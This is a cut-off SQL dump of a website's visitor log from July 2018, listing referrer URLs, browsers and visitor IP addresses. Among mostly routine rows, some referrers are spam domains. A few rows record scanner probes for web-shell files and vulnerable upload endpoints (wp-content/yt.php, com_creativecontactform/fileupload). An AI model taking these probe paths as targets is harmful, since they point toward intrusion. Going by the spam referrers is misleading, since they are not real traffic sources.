'Windows','5.0','','208.80.194.29','000',1,0),(33771,'2018-07-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','18.236.160.16','000',2,0),(33772,'2018-07-26','http://dosugrostov.site/','Opera','Windows','8.00','','46.119.124.149','000',2,0),(33773,'2018-07-26','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',2,0),(33774,'2018-07-26','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(33775,'2018-07-26','http://www.rospromtest.ru/','MSIE','Windows','5.5','','5.248.253.117','000',3,0),(33776,'2018-07-26','https://zphiblgz.org','Firefox','Windows','40.1','','203.115.144.94','000',1,0),(33777,'2018-07-26','https://zphiblgz.org','Firefox','Windows','40.1','','122.53.138.64','000',1,0),(33778,'2018-07-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(33779,'2018-07-26','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(33780,'2018-07-26','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(33781,'2018-07-26','http://www.zphiblgz.org/server/php/','Chrome','Windows','42.0.2311.152','','216.244.65.12','000',2,0),(33782,'2018-07-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.v9jv2H7S91-4kIbV08tLSCcov42pzafO5tNEbFDQ2nE.88a37d30e8ccdf4776327426ca4168baf9a4a173&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043elZxV2UyU2VrclpvUGJRTzFqSnE2QmhsbVRua1RQMFcwUmNTZ01lRFhZZyws&sign=c22f4b965dee560355b34b0596096b08&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.46.110','000',2,0),(33783,'2018-07-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.OlkBMo43VYbj-solh6EU4t67bBbzJ5I0rnl0jEgtgoU.28b4cea4691532dc8d8507f55ba80c27c8790a9a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NDBzb0tIeGtTMXFVV0JzV0taeUtwbGJScWpNQmMxX1NRUkl3ZTlyQnk3dyws&sign=8e3240b0ca42f9a82a7b34d0cfc1db62&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.203','000',2,0),(33784,'2018-07-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.NpQGxCDy8XiZ-EIIVvQn9Yciskvy2lfrG6YnfUqMqhc.841e570750dc3b921c83f1b4ec07d654c5d801f9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RGZ2U05JcHljWl9yODJscG10TWlncTFGbGRYeWtmWWlQSzJXbVluemNuZyws&sign=66d5753ef875c6b195d34646d68dcac7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(33785,'2018-07-26','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.OzPtz4yPmSjNtLsMVTk2AGKgdCKkQYNIrJ48ltLQSKE.6acb54748de8917632986fd7f0f1647853a024b9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NktLeG1hcFJxLTlaUldWM3BORmhmdC01LWx3SEdZRE1fREFOenpmV3ZKZyws&sign=b8dd7b15a007d8e286455839c2df3216&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.129','000',2,0),(33786,'2018-07-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.tBVW9zupA82dqjasnWaAZLFikYxbSIL6U3GlaqjgkkE.226d3004ecce3f8d93c7236a894dd81bc126af70&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040LTlZTVluZ00tYUlaUWwwNUNPVmtjVWRQSG9nUGg2WldxeWRYbzdmcEhRQSws&sign=03fa8a0cf570e4599686c33230c6d75e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.217.72.127','000',2,0),(33787,'2018-07-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.6WYaz-laAMz34h0_VX4br_Fm_Tg4sLEcKc4-PQd-qV4.e3386224ee385ed947f575bdf78cde7dc571e0c8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041c2hZWWFDNDlYeldLdjNFUlUxZ2Rlell5S0ZNTGEzWTdNU2x3d1lPQVkzZyws&sign=8b270ae88868d130737a94269a2a211b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.165.96','000',2,0),(33788,'2018-07-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1860.ra_e8mJwYLc5bNSsxMELg8TjlFn-NZrAqh1vb3Irvfk.86ecea507889033d1567e467413f30ed03eba407&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WXlQeU5ESnJ1cl9JbjJpNUlxQ2VaLXg5MkJXbU8yNGo0YzJUV0U5VzVDQSws&sign=78a6260e0b1f2ddc05d1cefb6908a269&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.166.33','000',2,0),(33789,'2018-07-26','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(33790,'2018-07-26','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(33791,'2018-07-26','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.67','000',2,0),(33792,'2018-07-26','https://bpro1.top/','Opera','Windows','7.54','','46.118.159.228','000',2,0),(33793,'2018-07-26','zphiblgz.org','dfgdfg36fsdfsgh','Unknown','Unknown','','159.100.29.243','000',1,0),(33794,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','173.212.224.12','000',2,0),(33795,'2018-07-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.220.107.89','000',2,0),(33796,'2018-07-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.220.49.201','000',1,0),(33797,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.121.12.106','000',5,0),(33798,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','78.129.140.8','000',5,0),(33799,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.196.133.205','000',5,0),(33800,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','208.97.138.194','000',4,0),(33801,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','108.167.174.192','000',5,0),(33802,'2018-07-26','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(33803,'2018-07-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','50.63.160.72','000',5,0),(33804,'2018-07-26','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.171.130','000',1,0),(33805,'2018-07-26','https://www.zphiblgz.org/','Chrome','Windows','66.0.3359.117','','107.6.171.132','000',1,0),(33806,'2018-07-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.143','000',6,0),(33807,'2018-07-26','https://www.google.com/','Chrome','Windows','67.0.3396.99','','96.5.110.26','000',4,0),(33808,'2018-07-26','zphiblgz.org','dfgdfg36fsdfsgh','Unknown','Unknown','','211.57.200.67','000',1,0),(33809,'2018-07-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.205.119.106','000',4,0),(33810,'2018-07-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.127.133','000',19,0),(33811,'2018-07-26','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.127.133','000',1,0),(33812,'2018-07-26','http://zphiblgz.org/wp-cahce.php','MSIE','Windows','6.0','','37.143.247.144','000',1,0),(33813,'2018-07-26','http://ruspoety.ru/','Opera','Windows','6.01','','178.137.95.1','000',1,0),(33814,'2018-07-26','https://zphiblgz.org','Firefox','Windows','40.1','','60.48.87.166','000',2,0),(33815,'2018-07-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(33816,'2018-07-26','https://www.google.com/','Chrome','Windows','67.0.3396.99','','96.244.96.210','000',1,0),(33817,'2018-07-26','android-app://com.google.android.googlequicksearchbox','Chrome','Android','67.0.3396.81','','99.203.84.16','000',2,0),(33818,'2018-07-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(33819,'2018-07-26','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(33820,'2018-07-26','https://zphiblgz.org/','MSIE','Windows','11.0','','163.172.4.153','000',1,0),(33821,'2018-07-26','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.35','000',1,0),(33822,'2018-07-26','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(33823,'2018-07-26','https://manimpotence.com/','MSIE','Windows','6.0','','178.137.94.200','000',1,0),(33824,'2018-07-26','https://zphiblgz.org','Firefox','Windows','40.1','','189.41.96.145','000',2,0),(33825,'2018-07-26','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.41','000',2,0),(33826,'2018-07-26','https://rent2spb.ru/','MSIE','Windows','6.0','','46.118.125.157','000',5,0),(33827,'2018-07-26','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(33828,'2018-07-26','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(33829,'2018-07-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','54.245.200.148','000',2,0),(33830,'2018-07-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','62.210.196.97','000',2,0),(33831,'2018-07-26','https://zphiblgz.org','Firefox','Linux','59.0','','52.165.150.117','000',1,0),(33832,'2018-07-26','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.214.101','000',2,0),(33833,'2018-07-26','http://zphiblgz.org/components/com_creativecontactform/fileupload/index.php','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',2,0),(33834,'2018-07-26','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(33835,'2018-07-26','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.35','000',1,0),(33836,'2018-07-26','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','213.32.113.2','000',2,0),(33837,'2018-07-26','https://top-l2.com/','Opera','Windows','8.00','','178.137.94.200','000',2,0),(33838,'2018-07-26','https://zphiblgz.org/','Firefox','Windows','32.1','','64.85.24.24','000',2,0),(33839,'2018-07-27','http://elementspluss.ru/','Opera','Windows','8.00','','178.137.95.1','000',2,0),(33840,'2018-07-27','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(33841,'2018-07-27','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(33842,'2018-07-27','http://x5market.ru/','Opera','Windows','7.54','','178.137.95.1','000',3,0),(33843,'2018-07-27','http://www.rospromtest.ru/','Unknown','Unknown','Unknown','','5.248.253.117','000',3,0),(33844,'2018-07-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.3EU1sL6eW5caaGef7GJn9OKfBe4ECDs3ZwjAiSHvEhE.e0ac8140877fc2d9d7f8be30211b52ce8ffaaa34&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041aWVzcENrcUhvWVVTN0tKOW1Wc1ZRaXo2UUROTnppSzJIVk9rdENKazRSdyws&sign=4290f79185bb7d1119e62565dad05fb5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.109.4','000',2,0),(33845,'2018-07-27','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.SAjhuIwDVzZPHrH-78o1tRcWZOfjPQrSuEY1E57TdrA.100b8ae23ed3101eb40c1125180cbf46ab697b58&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040UDl5SEx3N291LWRIbEJPZWJGaVhsUjF4d18yQ1h4UU90V0E4NzlsRi1Bdyws&sign=3f569b3113bbef99b956998c130ec7f5&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.129','000',2,0),(33846,'2018-07-27','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.RavXoSbINk5VT2j9jJbXAdwlcKBqrS8-E0lFQDIlj3A.5d4829b802485659c12678eed221e8134c8423c1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041cTdSMTFMd3VpWXZJMlVTbFhrZVJCVXBIak5HWFdUSkJEd0Y4Z00tZFhxUSws&sign=32fd1b1e5230a3220e80602e7229356b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','149.56.128.37','000',2,0),(33847,'2018-07-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.y_XjAAorl9oUswDddzeCRMsChb9ksBDGQo8QwPDDzD4.04196dc4462cc9a48399acd6ee4e5ba90a49eee1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042a0M4WHRVV2xtUTNHa3hJTHd5MEhDMUZXcnZlTVRyaEU1NVdjSzNaTzVrUSws&sign=022093635f1a435782e1392f976546a1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.31.81','000',2,0),(33848,'2018-07-27','http://viagra-soft.ru/','Unknown','Unknown','Unknown','','178.137.161.193','000',3,0),(33849,'2018-07-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.rtHn9fPq03ZiKq_D79vJ1XRyCQhZuzNI_vFEH9llfsA.4fc537abe36bf7c7a060185337ace29908b57f0b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZHVCc3FfWlhWNUVsZG9sRVF4RlgtNWFFMGp5NHFyZl9RbGRsQ2dFZ3Z4Zyws&sign=719ddf63e88358601c16c6f0dd1a1584&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.217.72.127','000',2,0),(33850,'2018-07-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.JBOSkpG52AF4ghWTohbMBe-rLnKz0x_BbaXKxEFU5oM.d6ea980369a9c6296d2536fbae51c8ec8c13ae54&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SW95NTk3OEQwWFd1WmsySzl0cTl4bWFVNEFIWWc3cGNDYWpmeXRmMFU1dyws&sign=1d560fb8ade0c245bee02f11de0edf41&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.161.112','000',2,0),(33851,'2018-07-27','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1861.-tggiswb9bI65isyAYlKsAPPFSa8fs8i-gM9dyM4tn4.3421aa373e0ede29ae4010f2e23d8bbced06e3f2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040bnUtSy1EQ0VyM3VKcTRpRnNHZEY0bUhVVzZFRTRHaHYzYl93dXRBelZqUSws&sign=45a5eff461de1fcd3f67100160738fec&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.231.216','000',2,0),(33852,'2018-07-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(33853,'2018-07-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',4,0),(33854,'2018-07-27','https://zphiblgz.org','Chrome','Linux','60.0.3112.101','','54.160.98.236','000',3,0),(33855,'2018-07-27','https://zphiblgz.org','Chrome','Linux','60.0.3112.50','','54.160.98.236','000',3,0),(33856,'2018-07-27','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(33857,'2018-07-27','https://zphiblgz.org/','Chrome','Windows','66.0.3359.170','','217.66.234.113','000',3,0),(33858,'2018-07-27','http://dosugrostov.site/','Opera','Windows','6.01','','46.118.125.157','000',1,0),(33859,'2018-07-27','http://zphiblgz.org/','Chrome','Windows','53.0.2785.104','','144.208.121.134','000',1,0),(33860,'2018-07-27','https://impotentik.com/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33861,'2018-07-27','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(33862,'2018-07-27','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','172.58.46.234','000',1,0),(33863,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','39.104.83.209','000',1,0),(33864,'2018-07-27','http://www.rospromtest.ru/','MSIE','Windows','6.0','','178.137.161.193','000',6,0),(33865,'2018-07-27','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(33866,'2018-07-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(33867,'2018-07-27','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(33868,'2018-07-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(33869,'2018-07-27','https://zphiblgz.org','Firefox','Windows','40.1','','95.94.110.227','000',2,0),(33870,'2018-07-27','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(33871,'2018-07-27','https://zphiblgz.org','curl','Unknown','7.29.0','','171.43.186.108','000',1,0),(33872,'2018-07-27','https://zphiblgz.org','Chrome','Android','61.0.3163.100','','119.96.97.118','000',1,0),(33873,'2018-07-27','https://zphiblgz.org','Chrome','Android','61.0.3163.100','','59.173.197.12','000',2,0),(33874,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','198.71.62.50','000',1,0),(33875,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.202','000',1,0),(33876,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.139.190.57','000',1,0),(33877,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','64.71.32.80','000',1,0),(33878,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.41.8.98','000',1,0),(33879,'2018-07-27','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.139','000',1,0),(33880,'2018-07-27','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','Opera','Windows','7.54','','46.118.125.157','000',2,0),(33881,'2018-07-27','http://www.bing.com/search?q=conway+scholarship&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','23.101.169.3','000',8,0),(33882,'2018-07-27','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33883,'2018-07-27','http://pornoplen.com/','Opera','Windows','8.00','','178.137.94.200','000',3,0),(33884,'2018-07-27','http://sladkoevideo.com/','MSIE','Unknown','6.0','','178.137.161.193','000',2,0),(33885,'2018-07-27','https://zphiblgz.org/cause/scholarship/','MSIE','Windows','7.0','','173.208.91.178','000',1,0),(33886,'2018-07-27','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','163.172.122.165','000',2,0),(33887,'2018-07-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(33888,'2018-07-27','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.220.210.116','000',2,0),(33889,'2018-07-27','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.35','000',1,0),(33890,'2018-07-27','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','209.250.229.141','000',2,0),(33891,'2018-07-28','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(33892,'2018-07-28','http://zphiblgz.org/wp-content/yt.php','MSIE','Windows','6.0','','87.247.23.28','000',1,0),(33893,'2018-07-28','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(33894,'2018-07-28','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(33895,'2018-07-28','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','159.69.51.50','000',1,0),(33896,'2018-07-28','https://zphiblgz.org','Chrome','Linux','56.0.2924.87','','46.229.170.197','000',1,0),(33897,'2018-07-28','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(33898,'2018-07-28','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(33899,'2018-07-28','http://rusochineniya.ru/','Opera','Windows','7.60','','178.137.95.1','000',3,0),(33900,'2018-07-28','http://purchasepillsnorx.com/','MSIE','Windows','6.0','','178.137.95.1','000',1,0),(33901,'2018-07-28','https://impotentik.com/','Opera','Windows','9.0','','178.137.94.200','000',1,0),(33902,'2018-07-28','https://zphiblgz.org','MSIE','Windows','10.0','','49.84.150.146','000',1,0),(33903,'2018-07-28','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','104.221.204.54','000',1,0),(33904,'2018-07-28','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','182.101.50.65','000',1,0),(33905,'2018-07-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(33906,'2018-07-28','https://zphiblgz.org','Chrome','Linux','64.0.3282.140','','5.9.94.207','000',1,0),(33907,'2018-07-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.WmGbDusM1hZMtSjHwiTwFTKVzx7EueZ17I99L03EzLA.5c109c210a637003ec28726328d93314c9afa7b4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NE5YZ2xtejl1TE9sZzlhbXpobUp0RmlUc0JpZ29yRzR5cnBQWERGeW1PQSws&sign=f5a8f48d35c546e3a7489bad2fed569b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.49','000',2,0),(33908,'2018-07-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.oxvJrhxh9XyfoqBKfNlKnM5kjEvMIjXlFoNV4IOYjiE.b9913f09320ced80f3f3d8cc1cfb974015db1413&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Mncwc2FUU1RodGhuM3FfR1BXcjVSQ0xoaXNNbmFaemtIWG1pVjNwTkpRQSws&sign=ea83ab7ed16f0ebdecf4c19662550bce&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.37.216','000',2,0),(33909,'2018-07-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.dLygqFsw3XN9SAwVwfml7dN95b-byk0BhF8dttL2QeQ.5cd1ac338abb3a488d9c1bb32ae50e661522e8e3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040bXl2UVVRUDZOVl93ZlpuWGpRNlZYTzhfYTdlZ21JUVUtVk1KNVRmRXVWZyws&sign=8ab208c74e2cb76376186d01ab4b21bf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.195.73','000',2,0),(33910,'2018-07-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.JP6Rv4M8L-OivOstCh6S960D2jXpolS_-Cp4D_auTwE.a64067b0db91bc9373be7d81d8d95546c24db165&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RnNhZGlQN3VOYVFfM3VEckN3dFIwaXA1b0l5NmtyT0NRcGVkVWZfWmR1Zyws&sign=2e468c8213cd8db7a5263cfc504cd90b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(33911,'2018-07-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.Cokg-_4aRET78OO4XQ6VC3clsv54hGEdV00wWTK_KBk.19976e202f45c39c229d3a77b15aa390b932ee82&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WngtY2ZWc0VxTHFIVXJCaTlfdGUtdHFlOGZ6eUk5S3JzR0p1NW5TUVhkQSws&sign=98ee4f9ec46d384ad72ecc7d1ab91183&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.79.132.46','000',2,0),(33912,'2018-07-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.OMWG5K6GEWj94mGxkmkfpKB5XZbMsVXCEtVn5xFl0r4.820b264e9ad5f73eb15ac22bfa0360c213349753&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMB